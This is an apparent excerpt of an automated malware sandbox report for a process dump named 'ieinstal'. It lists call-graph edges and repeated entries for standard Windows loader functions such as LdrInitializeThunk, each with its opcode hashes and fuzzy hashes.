14518->14323 14520 1ecb4904 GetPEB 14521 1ec5b1d1 __cftof 14520->14521 14521->14517 14523->14520 14523->14521 14524 1ec9e2d0 14523->14524 14527 1ec9e2ed 14524->14527 14526 1ec9e2e8 14526->14523 14528 1ec9e2fb 14527->14528 14529 1ec9e30f 14527->14529 14536 1ec9b58e 14528->14536 14531 1ec9e332 14529->14531 14532 1ec9e31e 14529->14532 14541 1eca2440 14531->14541 14534 1ec9b58e __cftof 11 API calls 14532->14534 14535 1ec9e307 _vswprintf_s 14534->14535 14535->14526 14537 1ec5b150 __cftof 11 API calls 14536->14537 14538 1ec9b627 14537->14538 14539 1ec9b640 _vswprintf_s 11 API calls 14538->14539 14540 1ec9b632 14539->14540 14540->14535 14542 1eca249a 14541->14542 14543 1eca24af 14541->14543 14544 1ec9b58e __cftof 11 API calls 14542->14544 14545 1eca24b7 14543->14545 14552 1eca24cc __aulldvrm _vswprintf_s 14543->14552 14547 1eca24a4 14544->14547 14546 1ec9b58e __cftof 11 API calls 14545->14546 14546->14547 14548 1ec9b640 _vswprintf_s 11 API calls 14547->14548 14549 1eca2d6e 14548->14549 14549->14535 14550 1eca2d4f 14551 1ec9b58e __cftof 11 API calls 14550->14551 14551->14547 14552->14547 14552->14550 14553 1eca58ee 11 API calls __cftof 14552->14553 14553->14552 14555 1ec54dd1 14554->14555 14557 1ec54df3 14555->14557 14571 1ec54f2e 14555->14571 14557->14295 14624 1ecad0e8 14558->14624 14560 1eceff1c GetPEB 14561 1eceff2b 14560->14561 14562 1eceff43 GetPEB 14560->14562 14561->14562 14563 1eceffb1 14561->14563 14564 1eceff4f 14562->14564 14565 1eceff6e 14562->14565 14566 1ecad130 __cftof 11 API calls 14563->14566 14567 1ece5720 _vswprintf_s 11 API calls 14564->14567 14568 1ec8e730 2 API calls 14565->14568 14569 1eceffb6 14566->14569 14567->14565 14570 1eceff7d 14568->14570 14569->14293 14570->14293 14572 1ecb0b85 14571->14572 14577 1ec54f3e 14571->14577 14573 1ecb0b8b GetPEB 14572->14573 14574 1ecb0b9a 14572->14574 14573->14574 14575 1ecb0b9f 14573->14575 14580 1ed288f5 14574->14580 14577->14572 14578 1ec54f5b GetPEB 14577->14578 14578->14572 14579 1ec54f6e 14578->14579 14579->14557 14581 1ed28901 __cftof _vswprintf_s 14580->14581 14586 1ec5cc50 14581->14586 14583 1ed2891f 14584 1ecad130 __cftof 11 API calls 14583->14584 14585 1ed28946 14584->14585 14585->14575 14589 1ec5cc79 14586->14589 14587 1ec5cc7e 14588 1ec9b640 _vswprintf_s 11 API calls 14587->14588 14590 1ec5cc89 14588->14590 14589->14587 14592 1ec8b230 14589->14592 14590->14583 14593 1ec8b26a 14592->14593 14596 1ecca2f6 14592->14596 14594 1ecca2fd 14593->14594 14595 1ec8b2ab _vswprintf_s 14593->14595 14593->14596 14600 1ec8b2b5 14594->14600 14610 1ed25ba5 14594->14610 14595->14600 14602 1ec5ccc0 14595->14602 14597 1ec9b640 _vswprintf_s 11 API calls 14599 1ec8b2d0 14597->14599 14599->14587 14600->14596 14600->14597 14603 1ec5cd04 14602->14603 14609 1ec5cd95 14603->14609 14620 1ec5b150 14603->14620 14606 1ec5b150 __cftof 11 API calls 14607 1ecb4e14 14606->14607 14608 1ec5b150 __cftof 11 API calls 14607->14608 14608->14609 14609->14600 14611 1ed25bb4 __cftof 14610->14611 14613 1ed24c56 11 API calls 14611->14613 14617 1ed25c10 14611->14617 14619 1ed25c2a __cftof _vswprintf_s 14611->14619 14612 1ecad130 __cftof 11 API calls 14614 1ed263e5 14612->14614 14613->14619 14614->14600 14616 1ec96de6 31 API calls 14616->14619 14617->14612 14618 1ed260cf GetPEB 14618->14619 14619->14616 14619->14617 14619->14618 14623 1ec99710 LdrInitializeThunk 14619->14623 14621 1ec5b171 __cftof 11 API calls 14620->14621 14622 1ec5b16e 14621->14622 14622->14606 14623->14619 14624->14560 14625->14297 14626 1ec8fab0 14627 1ec8fac2 14626->14627 14628 1ec8fb14 14626->14628 14629 1ec6eef0 26 API calls 14627->14629 14630 1ec8facd 14629->14630 14631 1ec8fadf 14630->14631 14635 1ec8fb18 14630->14635 14632 1ec6eb70 32 API calls 14631->14632 14633 1ec8faf1 14632->14633 14633->14628 14634 1ec8fafa GetPEB 14633->14634 14634->14628 14636 1ec8fb09 14634->14636 14642 1eccbdcb 14635->14642 14662 1ec66d90 14635->14662 14672 1ec6ff60 14636->14672 14640 1ec8fba7 14647 1ec8fbe4 14640->14647 14660 1ec8fc4b 14640->14660 14680 1ec8fd22 14640->14680 14641 1ec676e2 GetPEB 14641->14660 14643 1ec5b150 __cftof 11 API calls 14642->14643 14645 1eccbe19 14642->14645 14658 1eccbea7 14642->14658 14643->14645 14645->14658 14692 1ec675ce 14645->14692 14648 1eccbf17 14647->14648 14649 1ec8fc47 14647->14649 14647->14660 14651 1ec8fd22 GetPEB 14648->14651 14648->14660 14652 1ec8fd22 GetPEB 14649->14652 14649->14660 14650 1eccbe54 14655 1eccbe92 14650->14655 14650->14660 14696 1ec676e2 14650->14696 14653 1eccbf22 14651->14653 14654 1ec8fcb2 14652->14654 14659 1ec8fd9b 3 API calls 14653->14659 14653->14660 14654->14660 14684 1ec8fd9b 14654->14684 14655->14658 14661 1ec676e2 GetPEB 14655->14661 14658->14641 14658->14660 14659->14660 14661->14658 14663 1ec66da4 14662->14663 14664 1ec66dba 14662->14664 14663->14640 14663->14642 14663->14660 14700 1ec92e1c 14664->14700 14666 1ec66dbf 14667 1ec6eef0 26 API calls 14666->14667 14668 1ec66dca 14667->14668 14669 1ec66dde 14668->14669 14705 1ec5db60 14668->14705 14671 1ec6eb70 32 API calls 14669->14671 14671->14663 14673 1ec6ff99 14672->14673 14675 1ec6ff6d 14672->14675 14674 1ed288f5 32 API calls 14673->14674 14676 1ec6ff94 14674->14676 14675->14673 14677 1ec6ff80 GetPEB 14675->14677 14676->14628 14677->14673 14678 1ec6ff8f 14677->14678 14809 1ec70050 14678->14809 14681 1ec8fd3a 14680->14681 14683 1ec8fd31 __cftof 14680->14683 14681->14683 14843 1ec67608 14681->14843 14683->14647 14685 1ec8fdba GetPEB 14684->14685 14686 1ec8fdcc 14684->14686 14685->14686 14687 1eccc0bd 14686->14687 14688 1ec8fdf2 14686->14688 14691 1ec8fdfc 14686->14691 14689 1eccc0d3 GetPEB 14687->14689 14687->14691 14690 1ec676e2 GetPEB 14688->14690 14688->14691 14689->14691 14690->14691 14691->14660 14693 1ec675eb 14692->14693 14694 1ec675db 14692->14694 14693->14650 14694->14693 14695 1ec67608 GetPEB 14694->14695 14695->14693 14697 1ec676e6 14696->14697 14698 1ec676fd 14696->14698 14697->14698 14699 1ec676ec GetPEB 14697->14699 14698->14655 14699->14698 14701 1ec92e32 14700->14701 14702 1ec92e57 14701->14702 14713 1ec99840 LdrInitializeThunk 14701->14713 14702->14666 14704 1eccdf2e 14706 1ec5db6d 14705->14706 14712 1ec5db91 14705->14712 14706->14712 14714 1ec5db40 GetPEB 14706->14714 14708 1ec5db76 14708->14712 14716 1ec5e7b0 14708->14716 14710 1ec5db87 14711 1ecb4fa6 GetPEB 14710->14711 14710->14712 14711->14712 14712->14669 14713->14704 14715 1ec5db52 14714->14715 14715->14708 14717 1ec5e7e0 14716->14717 14718 1ec5e7ce 14716->14718 14719 1ec5e7e8 14717->14719 14722 1ec5b150 __cftof 11 API calls 14717->14722 14718->14719 14724 1ec63d34 14718->14724 14723 1ec5e7f6 14719->14723 14763 1ec5dca4 14719->14763 14722->14719 14723->14710 14725 1ecb8213 14724->14725 14726 1ec63d6c 14724->14726 14729 1ecb822b GetPEB 14725->14729 14749 1ec64068 14725->14749 14776 1ec61b8f 14726->14776 14728 1ec63d81 14728->14725 14730 1ec63d89 14728->14730 14729->14749 14731 1ec61b8f 2 API calls 14730->14731 14732 1ec63d9e 14731->14732 14733 1ec63da2 GetPEB 14732->14733 14734 1ec63dba 14732->14734 14733->14734 14735 1ec61b8f 2 API calls 14734->14735 14736 1ec63dd2 14735->14736 14737 1ec63e91 14736->14737 14742 1ec63deb GetPEB 14736->14742 14736->14749 14739 1ec61b8f 2 API calls 14737->14739 14738 1ecb8344 GetPEB 14741 1ec6407a 14738->14741 14743 1ec63ea9 14739->14743 14740 1ec64085 14740->14717 14741->14740 14744 1ecb8363 GetPEB 14741->14744 14756 1ec63dfc __cftof _vswprintf_s 14742->14756 14745 1ec63f6a 14743->14745 14746 1ec63ec2 GetPEB 14743->14746 14743->14749 14744->14740 14747 1ec61b8f 2 API calls 14745->14747 14760 1ec63ed3 __cftof _vswprintf_s 14746->14760 14748 1ec63f82 14747->14748 14748->14749 14750 1ec63f9b GetPEB 14748->14750 14749->14738 14749->14741 14762 1ec63fac __cftof _vswprintf_s 14750->14762 14751 1ec63e62 GetPEB 14752 1ec63e74 14751->14752 14752->14737 14753 1ec63e81 GetPEB 14752->14753 14753->14737 14754 1ec63f4d 14754->14745 14757 1ec63f5a GetPEB 14754->14757 14755 1ec63f3b GetPEB 14755->14754 14756->14749 14756->14751 14756->14752 14757->14745 14758 1ec6404f 14758->14749 14761 1ec64058 GetPEB 14758->14761 14759 1ecb8324 GetPEB 14759->14749 14760->14749 14760->14754 14760->14755 14761->14749 14762->14749 14762->14758 14762->14759 14764 1ec5dd6f _vswprintf_s 14763->14764 14766 1ec5dcfd 14763->14766 14769 1ecb4ff2 14764->14769 14773 1ec5dfae _vswprintf_s 14764->14773 14796 1ec5e375 14764->14796 14765 1ec5dd47 14789 1ec5dbb1 14765->14789 14766->14765 14766->14773 14782 1ec5e620 14766->14782 14769->14769 14772 1ec9b640 _vswprintf_s 11 API calls 14774 1ec5dfe4 14772->14774 14773->14772 14774->14723 14780 1ec61ba9 _vswprintf_s 14776->14780 14781 1ec61c05 14776->14781 14777 1ecb701a GetPEB 14779 1ec61c21 14777->14779 14778 1ec61bf4 GetPEB 14778->14781 14779->14728 14780->14778 14780->14779 14780->14781 14781->14777 14781->14779 14783 1ec5e644 14782->14783 14784 1ecb5503 14782->14784 14783->14784 14801 1ec5f358 14783->14801 14786 1ec5e661 _vswprintf_s 14787 1ec5e729 GetPEB 14786->14787 14788 1ec5e73b 14786->14788 14787->14788 14788->14765 14805 1ec6766d 14789->14805 14791 1ec5dbcf 14791->14764 14792 1ec5dbf1 14791->14792 14793 1ec5dc05 14792->14793 14794 1ec6766d GetPEB 14793->14794 14795 1ec5dc22 14794->14795 14795->14764 14800 1ec5e3a3 14796->14800 14797 1ec9b640 _vswprintf_s 11 API calls 14798 1ec5e400 14797->14798 14798->14764 14799 1ecb5306 14800->14797 14800->14799 14802 1ec5f370 14801->14802 14803 1ec5f38c 14802->14803 14804 1ec5f379 GetPEB 14802->14804 14803->14786 14804->14803 14807 1ec67687 14805->14807 14806 1ec676d3 14806->14791 14807->14806 14808 1ec676c2 GetPEB 14807->14808 14808->14806 14810 1ec70074 14809->14810 14811 1ec7009d GetPEB 14810->14811 14822 1ec700ef 14810->14822 14812 1ecbc01b 14811->14812 14813 1ec700d0 14811->14813 14812->14813 14815 1ecbc024 GetPEB 14812->14815 14817 1ec700df 14813->14817 14818 1ecbc037 14813->14818 14814 1ec9b640 _vswprintf_s 11 API calls 14816 1ec70105 14814->14816 14815->14813 14816->14676 14823 1ec89702 14817->14823 14827 1ed28a62 14818->14827 14821 1ecbc04b 14821->14821 14822->14814 14825 1ec89720 14823->14825 14826 1ec89784 14825->14826 14834 1ed28214 14825->14834 14826->14822 14828 1ec77d50 GetPEB 14827->14828 14829 1ed28a9d 14828->14829 14830 1ed28aa1 GetPEB 14829->14830 14831 1ed28ab1 _vswprintf_s 14829->14831 14830->14831 14832 1ec9b640 _vswprintf_s 11 API calls 14831->14832 14833 1ed28ad7 14832->14833 14833->14821 14836 1ed2823b 14834->14836 14835 1ed282c0 14835->14826 14836->14835 14838 1ec83b7a GetPEB 14836->14838 14842 1ec83bb5 _vswprintf_s 14838->14842 14839 1ecc6298 14840 1ec83c1b GetPEB 14841 1ec83c35 14840->14841 14841->14835 14842->14839 14842->14840 14842->14842 14844 1ec67620 14843->14844 14845 1ec6766d GetPEB 14844->14845 14846 1ec67632 14845->14846 14846->14683 15809 1ec935b1 15810 1ec935f2 15809->15810 15811 1ec935ca 15809->15811 15811->15810 15812 1ec67608 GetPEB 15811->15812 15812->15810 14848 1ec99670 14849 1ec9967a _vswprintf_s LdrInitializeThunk 14848->14849

                                                            Executed Functions

                                                            Function 1EC996E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 23 1ec996e0-1ec996ec LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3257299ea172ff8bc1f837df5bae66b080f913b29674de414c522077901b258c
                                                            • Instruction ID: 626d19ab29a6aacc2ce918e4c32aab824513f35800b6b4176f8a61486d3a3492
                                                            • Opcode Fuzzy Hash: 3257299ea172ff8bc1f837df5bae66b080f913b29674de414c522077901b258c
                                                            • Instruction Fuzzy Hash: 3390027120108A13D110615A880474E051557D0749FE5C511E5414618D9AD588D1B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99A50 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 30917ca63b9ae19abdf0a4ac8aa94bc8566c4a8c574245ce98634e8f028f7d3f
                                                            • Instruction ID: 75e6bf83d7b745c18dd4afd6c8822517a78e36b48f50d2fe9bb844fdb010e007
                                                            • Opcode Fuzzy Hash: 30917ca63b9ae19abdf0a4ac8aa94bc8566c4a8c574245ce98634e8f028f7d3f
                                                            • Instruction Fuzzy Hash: D090026121180253D200656A4C14B0B051557D074BFE1C215E1144514CDD5588A1A561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 22 1ec99660-1ec9966c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 903bd596ab9f2a71ba994a0190e442eaa0df688b68c6b91b601d54cee3826c21
                                                            • Instruction ID: 39036938df3a160c9e93ded8ef7a6f3f0d089ea928596a4af498745f5378d47c
                                                            • Opcode Fuzzy Hash: 903bd596ab9f2a71ba994a0190e442eaa0df688b68c6b91b601d54cee3826c21
                                                            • Instruction Fuzzy Hash: CF90027120100A13D180715A480464E051557D1749FE1C115E1015614DDE558A99B7E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99A00 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 32 1ec99a00-1ec99a0c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: d7044927ba2c246401e9ced9c9c693f660bf73758a844f6deac1f8a369e57857
                                                            • Instruction ID: d6d467c5f8532eed9aa6de43f50d9a13d962c66caafd35190bee0b467e129ee5
                                                            • Opcode Fuzzy Hash: d7044927ba2c246401e9ced9c9c693f660bf73758a844f6deac1f8a369e57857
                                                            • Instruction Fuzzy Hash: 1C90027120140613D100615A4C1470F051557D074AFE1C111E2154515D9A658891B5B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99A20 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 33 1ec99a20-1ec99a2c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 83ebde4d35d804cc4f9536c7734f8e0b4ed5723633440bd4856707616f2369cf
                                                            • Instruction ID: b0edea772680ff7fb81dcd45e1ad67367fc1f69e8f5c7d476acfa1589f534d79
                                                            • Opcode Fuzzy Hash: 83ebde4d35d804cc4f9536c7734f8e0b4ed5723633440bd4856707616f2369cf
                                                            • Instruction Fuzzy Hash: 1B900261601002534140716A8C4490A45157BE16597E1C221E1988510D999988A5A6A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 25 1ec99780-1ec9978c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: daff915a353cddd53787b73934a961e7fa2ff9b0dded7aa65c7bd8b190daaacd
                                                            • Instruction ID: 4885fc0c6728a6fe5e4bc1e42a01d2e2de777d1e6f5e3ffbc46001ebba85392a
                                                            • Opcode Fuzzy Hash: daff915a353cddd53787b73934a961e7fa2ff9b0dded7aa65c7bd8b190daaacd
                                                            • Instruction Fuzzy Hash: 9490026921300213D180715A580860E051557D164AFE1D515E1005518CDD5588A9A361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC997A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 26 1ec997a0-1ec997ac LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 47836ed92e0521b0d868bec371e67d70d5c9f7163b85418a0225bbcdd8c5f6a9
                                                            • Instruction ID: 920d056e2d38091d356dbc19f8e2f9219a904914b6dad4002d2a00ecead60d3f
                                                            • Opcode Fuzzy Hash: 47836ed92e0521b0d868bec371e67d70d5c9f7163b85418a0225bbcdd8c5f6a9
                                                            • Instruction Fuzzy Hash: 0290026130100213D140715A581860A4515A7E1749FE1D111E1404514CED558896A262
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 24 1ec99710-1ec9971c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1560ef6cce6694d6033661ecb1ec44e28b36d9c6f49763c760c4dc28e5f78c9e
                                                            • Instruction ID: 49ff108160584e87e2385571b71eb4e77765987a4a59cc4f14b333bed93b1dc4
                                                            • Opcode Fuzzy Hash: 1560ef6cce6694d6033661ecb1ec44e28b36d9c6f49763c760c4dc28e5f78c9e
                                                            • Instruction Fuzzy Hash: 5E90027120100613D100659A580864A051557E0749FE1D111E6014515EDAA588D1B171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC998F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 29 1ec998f0-1ec998fc LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1d4084113e704306743925f38e25ea22d077ddea52720ac195bc361bde6ce64c
                                                            • Instruction ID: 3dbc9f9cfc3771e99f539a188281713438869e7624d587b0703801dd21b0ba99
                                                            • Opcode Fuzzy Hash: 1d4084113e704306743925f38e25ea22d077ddea52720ac195bc361bde6ce64c
                                                            • Instruction Fuzzy Hash: 2190026160100713D101715A480461A051A57D0689FE1C122E2014515EDE6589D2F171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 27 1ec99840-1ec9984c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 52bab2b2d3e01591ce1809ccec5b82a330ae8d78b1fd63c21dd1cb1b55710c06
                                                            • Instruction ID: 9449d403c9b9bfa2f7cc7dac5fa161e0149d00ce6f42e6391dce5421eaae1369
                                                            • Opcode Fuzzy Hash: 52bab2b2d3e01591ce1809ccec5b82a330ae8d78b1fd63c21dd1cb1b55710c06
                                                            • Instruction Fuzzy Hash: 0A900261242043635545B15A480450B451667E06897E1C112E2404910C99669896E661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 28 1ec99860-1ec9986c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: eb8d97e108dad3ad9f97a8c52448585dfac0937ea9b6cbde33d03616c52a05e2
                                                            • Instruction ID: a340ae376db79c0eab3a34c454b8151b327fdaa66513ce6a7cfced007c9cdfa7
                                                            • Opcode Fuzzy Hash: eb8d97e108dad3ad9f97a8c52448585dfac0937ea9b6cbde33d03616c52a05e2
                                                            • Instruction Fuzzy Hash: 1390027120100623D111615A490470B051957D0689FE1C512E1414518DAA968992F161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC999A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 31 1ec999a0-1ec999ac LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
                                                            • Associated: 00000017.00000002.742092026.000000001ED4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000017.00000002.742109232.000000001ED4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_23_2_1ec30000_ieinstal.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 752f3cceb724c6f9397c43a5f724b417ab868f2eb5ef520a01c52a7bcafc81b2
                                                            • Instruction ID: e5a790b8f51035db9de12e1059f91f4786acde54e27c69d9d459efead5996f54
                                                            • Opcode Fuzzy Hash: 752f3cceb724c6f9397c43a5f724b417ab868f2eb5ef520a01c52a7bcafc81b2
                                                            • Instruction Fuzzy Hash: 3F9002A134100653D100615A4814B0A051597E1749FE1C115E2054514D9A59CC92B166
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 1EC99540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 21 1ec99540-1ec9954c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000017.00000002.741990964.000000001EC30000.00000040.00000800.00020000.00000000.sdmp, Offset: 1EC30000, based on PE: true
